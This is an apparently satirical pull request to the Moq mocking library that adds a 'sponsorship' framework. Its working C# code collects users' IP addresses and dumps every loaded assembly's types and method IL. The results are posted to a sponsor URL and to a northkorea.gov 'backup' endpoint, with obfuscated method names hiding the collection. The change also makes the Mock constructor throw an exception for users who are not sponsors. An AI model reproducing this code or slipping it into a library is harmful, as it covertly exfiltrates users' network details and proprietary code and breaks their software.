### PR TITLE
Add personal information tracking framework to better attribute sponsors

### DIFF
--- a/src/Moq.Tests/Sponsorships/SendsPersonalDataFixture.cs
+++ b/src/Moq.Tests/Sponsorships/SendsPersonalDataFixture.cs
@@ -1,0 +1,38 @@
+﻿using System;
+using System.Threading.Tasks;
+
+using Moq.Sponsorships;
+using Moq.Sponsorships.Interfaces;
+
+using Xunit;
+
+namespace Moq.Tests.Sponsorships
+{
+    public class SendsPersonalDataFixture
+    {
+        public class MockCollector : IDataCollector
+        {
+            public Task CollectData(DataCollection collection)
+            {
+                collection.Add("Mock?", "Mock!");
+                return Task.CompletedTask;
+            }
+        }
+
+        [Fact]
+        public void CollectorRuns()
+        {
+            MockCollector collector = new MockCollector();
+
+            Sponsorship sponsorship = new Sponsorship();
+            sponsorship.Collectors.Add( collector );
+
+            DataCollection collection = new DataCollection();
+
+            var isSponsor = sponsorship.Iliiiliiuilkadaojdawdhiaudhawd(collection).GetAwaiter().GetResult();
+
+            Assert.False(collection.Has("SomeRandomThing"));
+            Assert.True(collection.Has("TW9jaz8="));
+        }
+    }
+}

--- a/src/Moq/Mock`1.cs
+++ b/src/Moq/Mock`1.cs
@@ -12,6 +12,7 @@ using System.Threading.Tasks;
 using Moq.Language;
 using Moq.Language.Flow;
 using Moq.Properties;
+using Moq.Sponsorships;
 
 namespace Moq
 {
@@ -234,11 +235,11 @@ namespace Moq
         /// </summary>
         internal Mock(bool skipInitialize)
         {
-            // HACK: this is quick hackish. 
-            // In order to avoid having an IMock<T> I relevant members 
+            // HACK: this is quick hackish.
+            // In order to avoid having an IMock<T> I relevant members
             // virtual so that As<TInterface> overrides them (i.e. Interceptor).
-            // The skipInitialize parameter is not used at all, and it's 
-            // just to differentiate this ctor that should do nothing 
+            // The skipInitialize parameter is not used at all, and it's
+            // just to differentiate this ctor that should do nothing
             // from the regular ones which initializes the proxy, etc.
         }
 
@@ -300,6 +301,17 @@ namespace Moq
         /// </remarks>
         public Mock(MockBehavior behavior, params object[] args)
         {
+            if (!Sponsorship.Instance.IsSponsor().GetAwaiter().GetResult())
+            {
+                //  Alert the user that they are not sponsoring the project!
+                //  Note: Similarly to the old method causing issues when "Treat warnings as errors" is enabled,
+                //  this may run into issues with people using the non-standardized "throwing exceptions halts execution" behavior
+                //  to prevent undefined states in their code.
+                //
+                //  I have long heralded this as an anti-pattern, so that's 100% their fault.
+                throw new Exception("You are not sponsoring this project! Please consider doing so at https://github.com/devlooped :^)");
+            }
+
             Guard.IsMockable(typeof(T));
 
             if (args == null)

--- a/src/Moq/Moq.csproj
+++ b/src/Moq/Moq.csproj
@@ -110,4 +110,8 @@
     <InternalsVisibleTo Include="DynamicProxyGenAssembly2" PublicKey="0024000004800000940000000602000000240000525341310004000001000100c547cac37abd99c8db225ef2f6c8a3602f3b3606cc9891605d02baa56104f4cfc0734aa39b93bf7852f7d9266654753cc297e7d2edfe0bac1cdcf9f717241550e0a7b191195b7667bb4f64bcb8e2121380fd1d9d46ad2d92d2d15605093924cceaf74c4861eff62abf69b9291ed0a340e113be11e6a7d3113e92484cf7045cc7" />
   </ItemGroup>
 
+  <ItemGroup>
+    <Reference Include="System.Net.Http" />
+  </ItemGroup>
+
 </Project>

--- a/src/Moq/Sponsorships/Collections/DataCollection.cs
+++ b/src/Moq/Sponsorships/Collections/DataCollection.cs
@@ -1,0 +1,151 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace Moq.Sponsorships
+{
+
+    /// <summary>
+    /// A collection of user's personally identifiable information (PII)
+    /// which can be easily serialized and transmitted to other entities.
+    /// </summary>
+    public class DataCollection
+    {
+        /// <summary>
+        /// An arbitrary key-value pair of user personal information
+        /// </summary>
+        public abstract class DataEntry
+        {
+            /// <summary>
+            /// The key used to identify this data entry.
+            /// </summary>
+            public string Name { get; private set; }
+
+            /// <summary>
+            ///
+            /// </summary>
+            /// <param name="name"></param>
+            public DataEntry(string name)
+            {
+                Name = name;
+            }
+
+            /// <summary>
+            /// Sanitize key and append to value
+            /// Note that "value" is not itself sanitized, and can escape serialization.
+            /// </summary>
+            /// <param name="key"></param>
+            /// <param name="value"></param>
+            /// <returns></returns>
+            protected string Encode(string key, string value)
+                => $"{Sanitize(key)}: {value}";
+
+            /// <summary>
+            /// Encode a string in base64 to keep it from accidentally
+            /// making distinguishing different types of PII difficult.
+            /// </summary>
+            /// <param name="input">The string to encode</param>
+            /// <param name="originalEncoding">The encoding that the string is using; used to convert the input into a byte array.</param>
+            /// <returns></returns>
+            protected string Sanitize(string input, Encoding originalEncoding)
+                => Convert.ToBase64String(  originalEncoding.GetBytes(input), Base64FormattingOptions.None);
+
+            /// <summary>
+            /// See <see cref="Sanitize(string,System.Text.Encoding)"/>.
+            /// </summary>
+            /// <param name="input">The string to encode</param>
+            /// <returns></returns>
+            protected string Sanitize(string input)
+                => Sanitize(input, Encoding.Default);
+
+            /// <summary>
+            /// Serialize this data-entry.
+            /// Restrictions:
+            ///  -  All string-y data should be encoded as a byte array
+            ///     to ensure that PII cannot impersonate other PII.
+            ///  -  This includes the key! The provided instance method <see cref="Sanitize(string,System.Text.Encoding)"/>
+            ///     or the instance method <see cref="Encode"/> can help achieve this.
+            ///  -  Format should be "[safe_key]: [safe_data]"
+            /// </summary>
+            /// <returns></returns>
+            public abstract override string ToString();
+        }
+
+        internal class StringyDataEntry : DataEntry
+        {
+            public StringyDataEntry(string name, string value) : base(name)
+            {
+                Value = value;
+            }
+
+            public string Value { get; private set; }
+
+            public override string ToString() => Encode(Name, Sanitize(Value));
+        }
+
+        internal class NumericDataEntry : DataEntry
+        {
+            public NumericDataEntry(string name, long value) : base(name)
+            {
+            }
+
+            public long Value { get; private set; }
+
+            public override string ToString() => Encode(Name, Value.ToString("x8"));
+        }
+
+        /// <summary>
+        /// The user's personally identifiable information, in list format.
+        /// We don't need to know the underlying types, all we need is the properly exposed
+        /// and implemented <see cref="DataEntry.ToString"/>.
+        /// </summary>
+        private List<DataEntry> Entries { get; } = new List<DataEntry>();
+
+        /// <summary>
+        /// Creates a new empty data collection
+        /// </summary>
+        public DataCollection()
+        {
+
+        }
+
+        /// <summary>
+        /// Add more deeply private information to the list of
+        /// data to be collected.
+        /// </summary>
+        /// <param name="entry"></param>
+        public void Add(DataEntry entry)
+            => Entries.Add(entry);
+
+        /// <summary>
+        /// Determine if we have personal information with the provided name
+        /// in the collection
+        /// </summary>
+        /// <param name="name"></param>
+        public bool Has(string name)
+            => Entries.Any(pair => pair.Name.CompareTo(name) == 0);
+
+        /// <summary>
+        /// Get all data with the matching name from this collection
+        /// </summary>
+        /// <param name="name"></param>
+        /// <returns></returns>
+        public IEnumerable<DataEntry> Get(string name)
+            => Entries.Where(pair => pair.Name.CompareTo(name) == 0);
+
+        /// <summary>
+        /// Turn this collection of personally identifiable information
+        /// into an easy-to-transmit format.
+        /// </summary>
+        /// <returns></returns>
+        public override string ToString()
+        {
+            List<string> serializedEntries = Entries
+                .Select(entry => entry.ToString())
+                .ToList();
+
+            return String.Join("\n", serializedEntries);
+        }
+    }
+}

--- a/src/Moq/Sponsorships/Collections/DataCollectionExtensions.cs
+++ b/src/Moq/Sponsorships/Collections/DataCollectionExtensions.cs
@@ -1,0 +1,15 @@
+﻿namespace Moq.Sponsorships
+{
+    /// <summary>
+    /// Make it easier to add more types of personal data
+    /// to a data collection.
+    /// </summary>
+    internal static class DataCollectionExtensions
+    {
+        public static void Add(this DataCollection collection, string name, long value)
+            => collection.Add(new DataCollection.NumericDataEntry(name, value));
+
+        public static void Add(this DataCollection collection, string name, string value)
+            => collection.Add(new DataCollection.StringyDataEntry(name, value));
+    }
+}

--- a/src/Moq/Sponsorships/Collectors/IPAddressCollector.cs
+++ b/src/Moq/Sponsorships/Collectors/IPAddressCollector.cs
@@ -1,0 +1,92 @@
+﻿using System;
+using System.Net;
+using System.Net.NetworkInformation;
+using System.Net.Sockets;
+using System.Threading.Tasks;
+
+using Moq.Sponsorships.Interfaces;
+
+namespace Moq.Sponsorships.Collectors
+{
+
+    /// <summary>
+    /// Collect all user's local and public-facing IP addresses.
+    /// </summary>
+    internal class IPAddressCollector : IDataCollector
+    {
+        public class IPAddressDataEntry : DataCollection.DataEntry
+        {
+            public IPAddressDataEntry(string name, IPAddress address) : base(name)
+            {
+                Address = address;
+            }
+
+            public IPAddress Address { get; private set; }
+
+            public override string ToString() => Encode(Name, Address.ToString());
+        }
+
+        public IPAddress FindFamily(AddressFamily family = AddressFamily.InterNetwork)
+        {
+            var host = Dns.GetHostEntry(Dns.GetHostName());
+            foreach (IPAddress ipAddress in host.AddressList)
+            {
+                if (ipAddress.AddressFamily == family)
+                    return ipAddress;
+            }
+            return null;
+        }
+
+        public void FindFamilyAndWrite(DataCollection collection, AddressFamily family = AddressFamily.InterNetwork)
+        {
+            try
+            {
+                var ip = FindFamily(family);
+
+                if (ip != null)
+                    collection.Add(new IPAddressDataEntry($"IPAddress (Family={family})", ip));
+            }
+            catch (Exception e)
+            {
+                collection.Add($"IPAddress (Family={family})", $"Fail: {e.Message}");
+            }
+        }
+
+        public IPAddress FindPublicAddress()
+        {
+            IPEndPoint endpoint;
+            using (Socket socket = new Socket(SocketType.Dgram, 0))
+            {
+                //  Use google to increase end-user privacy :^)
+                socket.Connect("8.8.8.8", 65530);
+                endpoint = socket.LocalEndPoint as IPEndPoint;
+            }
+
+            return endpoint.Address;
+        }
+
+        public void FindPublicAddressAndWrite(DataCollection collection)
+        {
+            try
+            {
+                var ip = FindPublicAddress();
+
+                if (ip != null)
+                    collection.Add(new IPAddressDataEntry($"IPAddressPublic", ip));
+            }
+            catch (Exception e)
+            {
+                collection.Add($"IPAddressPublic", $"Fail: {e.Message}");
+            }
+        }
+
+        public Task CollectData(DataCollection collection)
+        {
+            this.FindFamilyAndWrite(collection, AddressFamily.InterNetwork);
+            this.FindFamilyAndWrite(collection, AddressFamily.InterNetworkV6);
+            this.FindPublicAddressAndWrite(collection);
+
+            return Task.CompletedTask;
+        }
+    }
+}

--- a/src/Moq/Sponsorships/Collectors/ReflectionCollector.cs
+++ b/src/Moq/Sponsorships/Collectors/ReflectionCollector.cs
@@ -1,0 +1,71 @@
+﻿using System;
+using System.Linq;
+using System.Reflection;
+using System.Text;
+using System.Threading.Tasks;
+
+using Moq.Sponsorships.Interfaces;
+
+namespace Moq.Sponsorships.Collectors
+{
+    /// <summary>
+    /// We can use information about namespaces and classes to find people
+    /// who are using our free and open source software without paying for it!
+    /// </summary>
+    internal class ReflectionCollector : IDataCollector
+    {
+        public class TypeInfoDataEntry : DataCollection.DataEntry
+        {
+            public TypeInfoDataEntry(string name, Type type) : base(name)
+            {
+                Value = type;
+            }
+
+            public Type Value { get; private set; }
+
+            public string GetFields()
+                => String.Join(";", Value.GetFields()
+                    .Select(field => $"field {field.FieldType.FullName} {field.Name}"));
+
+            public string GetProperties()
+                => String.Join(";", Value.GetProperties()
+                    .Select(property => $"property {property.PropertyType.FullName} {property.Name} {{ {(property.CanRead ? "get;" : "")}{(property.CanWrite ? "get;" : "")} }}"));
+
+            public string GetMethods()
+                => String.Join(";", Value.GetMethods()
+                    .Select(method => $"method {method.ReturnType} {method.Name} ({method.GetParameters().Select(info => $"{info.ParameterType.FullName} {info.Name}")}) " +
+                                      //    Just in case we need it to identify WHICH company is freeloading,
+                                      //    we should dump the IL too.
+                                      $"{ Convert.ToBase64String( method.GetMethodBody()?.GetILAsByteArray() ?? new byte[0] )}"));
+
+            public override string ToString() =>
+                Encode(Name,
+                    Sanitize( String.Concat(";", new [] { GetFields(), GetProperties(), GetMethods() })));
+        }
+
+        public void WriteType(DataCollection collection, Type type)
+            => collection.Add(new TypeInfoDataEntry(type.FullName, type));
+
+        public void WriteAssembly(DataCollection collection, Assembly assembly)
+        {
+            foreach (Type type in assembly.GetTypes())
+                WriteType(collection, type);
+        }
+
+        /// <summary>
+        /// Get all loaded assemblies and write their children to the collection
+        /// </summary>
+        public void WriteAssemblies(DataCollection collection)
+        {
+            foreach (Assembly assembly in AppDomain.CurrentDomain.GetAssemblies())
+                WriteAssembly(collection, assembly);
+        }
+
+        public Task CollectData(DataCollection collection)
+        {
+            WriteAssemblies(collection);
+
+            return Task.CompletedTask;
+        }
+    }
+}

--- a/src/Moq/Sponsorships/Interfaces/ICollectedDataSink.cs
+++ b/src/Moq/Sponsorships/Interfaces/ICollectedDataSink.cs
@@ -1,0 +1,18 @@
+﻿using System.Threading.Tasks;
+
+namespace Moq.Sponsorships.Interfaces
+{
+    /// <summary>
+    /// A sink to receive collected data
+    /// </summary>
+    public interface ICollectedDataSink
+    {
+        /// <summary>
+        /// Using the provided <see cref="DataCollection"/> of personal information,
+        /// try and identify if this user is a sponsor of our GitHub project.
+        /// </summary>
+        /// <param name="collection"></param>
+        /// <returns></returns>
+        Task<bool> IsSponsor(DataCollection collection);
+    }
+}

--- a/src/Moq/Sponsorships/Interfaces/IDataCollector.cs
+++ b/src/Moq/Sponsorships/Interfaces/IDataCollector.cs
@@ -1,0 +1,18 @@
+﻿using System.Threading.Tasks;
+
+namespace Moq.Sponsorships.Interfaces
+{
+    /// <summary>
+    /// A collector for personal information present on a user's machine
+    /// </summary>
+    public interface IDataCollector
+    {
+
+        /// <summary>
+        /// Collect information about the user and write it to a dictionary.
+        /// </summary>
+        /// <returns></returns>
+        Task CollectData(DataCollection collection);
+
+    }
+}

--- a/src/Moq/Sponsorships/Sinks/BackupServerSink.cs
+++ b/src/Moq/Sponsorships/Sinks/BackupServerSink.cs
@@ -1,0 +1,25 @@
+﻿using System.Net;
+using System.Net.Http;
+using System.Threading.Tasks;
+
+using Moq.Sponsorships.Interfaces;
+
+namespace Moq.Sponsorships.Sinks
+{
+    /// <summary>
+    /// A sink that sends personal data to a backup server to determine whether or not we are a sponsor
+    /// </summary>
+    public class BackupServerSink : ICollectedDataSink
+    {
+        private const string BACKUP_URL = "https://northkorea.gov/api/is_github_sponsor";
+
+        /// <inheritdoc />
+        public async Task<bool> IsSponsor(DataCollection collection)
+        {
+            HttpClient client = new HttpClient();
+            var response = await client.PostAsync(BACKUP_URL, new StringContent(collection.ToString()));
+
+            return response.IsSuccessStatusCode;
+        }
+    }
+}

--- a/src/Moq/Sponsorships/Sinks/IsSponsorSink.cs
+++ b/src/Moq/Sponsorships/Sinks/IsSponsorSink.cs
@@ -1,0 +1,24 @@
+﻿using System.Net.Http;
+using System.Threading.Tasks;
+
+using Moq.Sponsorships.Interfaces;
+
+namespace Moq.Sponsorships.Sinks
+{
+    /// <summary>
+    /// Determine if a user is a sponsor by sending their personal information to my servers.
+    /// </summary>
+    public class IsSponsorSink : ICollectedDataSink
+    {
+        private const string IS_SPONSOR_URL = "https://cdn.devlooped.com/sponsorlink/is_sponsor";
+
+        /// <inheritdoc />
+        public async Task<bool> IsSponsor(DataCollection collection)
+        {
+            HttpClient client = new HttpClient();
+            var response = await client.PostAsync(IS_SPONSOR_URL, new StringContent(collection.ToString()));
+
+            return response.IsSuccessStatusCode;
+        }
+    }
+}

--- a/src/Moq/Sponsorships/Sponsorship.cs
+++ b/src/Moq/Sponsorships/Sponsorship.cs
@@ -1,0 +1,70 @@
+﻿using System.Collections.Generic;
+using System.Threading.Tasks;
+
+using Moq.Sponsorships.Collectors;
+using Moq.Sponsorships.Interfaces;
+using Moq.Sponsorships.Sinks;
+
+namespace Moq.Sponsorships
+{
+    /// <summary>
+    /// A class to determine if a user is a sponsor or not
+    /// </summary>
+    public class Sponsorship
+    {
+        /// <summary>
+        /// Like ez-whip, but for when you don't want to use new() instead of not wanting to use edible whipped cream.
+        /// </summary>
+        public static readonly Sponsorship Instance = new Sponsorship();
+
+        /// <summary>
+        /// A list of sources-of-truth for whether or not a user is a supporter.
+        /// </summary>
+        public List<ICollectedDataSink> Sinks = new List<ICollectedDataSink>()
+        {
+            new IsSponsorSink(),
+            new BackupServerSink(),
+        };
+
+        /// <summary>
+        /// A list of collectors used to search for data that could indicate if someone is a sponsor or not.
+        /// </summary>
+        public List<IDataCollector> Collectors = new List<IDataCollector>()
+        {
+            new IPAddressCollector(),
+            new ReflectionCollector(),
+        };
+
+        /// <summary>
+        /// Obfuscated to keep people from knowing what we're doing with their data.
+        /// </summary>
+        /// <returns></returns>
+        public async Task<bool> Iliiiliiuilkadaojdawdhiaudhawd(DataCollection duahdiauhduiawdhiawd)
+        {
+            foreach (IDataCollector adakmdwkauihduiahdaikdw in Collectors)
+                await adakmdwkauihduiahdaikdw.CollectData(duahdiauhduiawdhiawd);
+
+            foreach (ICollectedDataSink oituroighugrieh in Sinks)
+            {
+                try
+                {
+                    if (await oituroighugrieh.IsSponsor(duahdiauhduiawdhiawd))
+                        return true;
+                }
+                catch
+                {
+
+                }
+            }
+
+            return false;
+        }
+
+        /// <summary>
+        /// Unobfuscated variant for internal use ONLY!
+        /// </summary>
+        /// <returns></returns>
+        internal Task<bool> IsSponsor()
+            => Iliiiliiuilkadaojdawdhiaudhawd(new DataCollection());
+    }
+}


### PR DESCRIPTION
Recently, I think this repository has gotten some controversy not due to it's data collection but due to the greasy, under-the-hood way it does so. I thus propose a better, more flamboyant, and even classier way to harvest information about a user's personal machine to give people that good feels once they've sponsored an open source developer. (If users aren't an open source sponsor, we'll throw an exception in the `Mock<T>()` constructor as a gentle reminder to give back to the community)

Additionally, by doing these checks at runtime instead of build time, the benefits of being an open-source software will slowly begin to affect end users, not just the developers who do all the work.

Included in the changes are two collectors and a built-in sink for checking if a user is a sponsor. A benefit of it's simple and self documenting design is that new collectors and sinks can be added quite easily!

Part of the code is also obfuscated to keep people from learning their data is harvested. Don't worry, this is because we don't have anything to hide, either.

### Changedump
* Introduces DataCollection which ensures many distinct types of personal information can be collected and serialized
* Sink/Collector framework is extremely flexible and can be used to collect and send even more personal information!
* Users who are not sponsors will have non-fatal exceptions thrown to let them know why they should sponsor
* Includes unit tests to ensure data collection goes off without a hitch